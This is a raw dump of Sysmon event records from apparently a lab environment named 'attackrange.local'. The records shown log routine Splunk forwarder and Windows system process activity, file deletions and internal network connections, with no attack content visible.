07:46:26.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806499Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806498Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806497Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806496Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806495Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806494Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.235{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F352-60EB-4C79-00000000D001}376C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806493Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.235{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F352-60EB-4C79-00000000D001}376C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806492Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:26.236{0C1E0330-F352-60EB-4C79-00000000D001}376C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806536Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.907{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81CA9C706CF0619331108A90C08E9082,SHA256=1DAE2E924B7DE05A9918473046C7A43762ED04C1157C672F4CB5E0A14FF97E3D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806535Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.782{0C1E0330-F353-60EB-4E79-00000000D001}15323664C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001046697Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:19.712{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50940-false10.0.1.12-8000- 23542300x80000000000000001046696Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:27.641{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4791B6DB589BB11B9EDF48D7D77952A,SHA256=048FE4B697F6C918B019BD4CBF725B4CB5BD4AA06075A0150A0499BF83B8F281,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806534Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.626{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F353-60EB-4E79-00000000D001}1532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806533Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.626{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806532Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.626{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806531Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.626{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806530Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.626{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806529Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.626{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806528Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.626{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806527Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.626{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806526Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.626{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806525Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.626{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806524Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.626{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F353-60EB-4E79-00000000D001}1532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806523Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.626{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F353-60EB-4E79-00000000D001}1532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806522Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.611{0C1E0330-F353-60EB-4E79-00000000D001}1532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000806521Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.290{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57189-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000806520Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.079{0C1E0330-F352-60EB-4D79-00000000D001}38882420C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000806552Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.813{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3E47B291A5F6B442DCF95B000BB0ED9,SHA256=01E9230B170A219D3A3EC1F2BE7489E74EAFB80CA61B692B77294BA18B46F5AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046698Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:28.656{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 